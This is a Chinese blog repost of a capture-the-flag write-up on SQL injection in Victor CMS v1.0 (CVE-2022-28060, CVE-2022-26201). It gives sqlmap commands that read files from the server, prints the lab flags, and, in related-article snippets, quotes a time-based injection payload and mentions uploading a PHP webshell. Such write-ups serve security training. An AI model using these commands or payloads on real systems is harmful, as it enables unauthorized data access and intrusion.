[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

这篇具有很好参考价值的文章主要介绍了[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


CVE-2022-28060

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

 python3 sqlmap.py -r 2.txt  --file-read "/flag" --dbms Mysql

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag 

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

动下小手来个赞吧~~~

flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}

CVE-2022-26201

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

 和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

  抓包,保存为3.txt,sqlmap跑起来,跟上面一样了

python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag   

cve-2022-26201复现,CTF,网络安全,安全,web安全,网络安全

 动下小手来个赞吧~~~

flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}

总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。

留个关注哦~~~文章来源地址https://www.toymoban.com/news/detail-516723.html

到了这里,关于[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云境:CVE-2022-28060

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Victor CMS v1.0 /includes/login.php 存在sql注入 解题步骤 访问URL,在登录过程中抓包: 探测存在SQL注入: 1\\\'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+\\\'1\\\'=\\\' 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取: 文章合集 :春秋云境

    2024年02月12日
    浏览(68)
  • 春秋云境:CVE-2022-26201(二次注入漏洞)

    一、题目 二、上传权限马 三、蚁剑马连接 进入题目:  这个是和春秋云境:CVE-2022-28060一个网站,看来应该是存在多个漏洞。 点击admin 不用登录  Users ---- add users 选择文件 这里要是jpg图片格式 如果是php格式是无法运行一句话木马的 普通的一句话木马上传 在这个靶场是访问

    2023年04月21日
    浏览(40)
  • 春秋云镜 CVE-2022-24124

    Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 网上poc,获取版本号 /api/get-organizations?p=123pageSize=123value=cfxsortField=sortOrder=field=upd

    2024年02月13日
    浏览(35)
  • 1、[春秋云镜]CVE-2022-32991

      靶场提示:该CMS的welcome.php中存在SQL注入攻击。   NVD关于漏洞的描述:   注入点不仅在 eid 处!!! (1)既然NVD说漏洞在welcome.php处,且参数为 eid ,先注册账号。 (2)登录账号后,发现页面就是welcome.php。 (3)随便点一个 action ,点点 submit ,会发现url中的n参数

    2024年02月11日
    浏览(36)
  • 【内网渗透】春秋云镜Intitle WP

    第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新 拿到地址先nmap扫端口 没什么发现,直接访问80端口,看到图标知道是thinkphp 用thinkphp漏洞集成工具测试,发现有rce的漏洞 一键getshell,用蚁剑连上去 whoami,发现权限比

    2024年02月01日
    浏览(39)
  • 春秋云镜 CVE-2019-16113

    在Bludit=3.9.2的版本中,攻击者可以通过定制uuid值将文件上传到指定的路径,然后通过bl-kernel/ajax/upload-images.php远程执行任意代码。 exp https://github.com/Kenun99/CVE-2019-16113-Dockerfile 修改poc.py,nc监听,反弹shell。 执行命令获取flag 得到flag flag{c54ea59f-e023-405a-af22-0202790209f2}

    2024年02月11日
    浏览(34)
  • [春秋云镜]CVE-2021-41402

    flatCore-CMS v2.0.8 存在后台任意代码执行漏洞 春秋云镜开启靶场: http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/ 前台爆破不了 我们先扫一下目录 Login eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/robots.txt 发现后台   使用0day登录后台 流程 Addons--I

    2024年02月12日
    浏览(45)
  • [春秋云镜]CVE-2014-3529

    Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。 春秋云镜开启靶场: http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/ 一:使用python开启一个web服务 python -m http.server 80 二:

    2023年04月19日
    浏览(31)
  • [春秋云镜]CVE-2021-32305

    WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 春秋云镜开启靶场: http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com 验证漏洞 http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com/search.php?sear

    2024年02月11日
    浏览(39)
  • [春秋云镜]CVE-2020-19960,CVE-2020-19961

    zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag) 春秋云镜开启靶场: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/ 后台 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php 账号admin 密码admin 登录进来找上传点  http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1

    2024年02月14日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包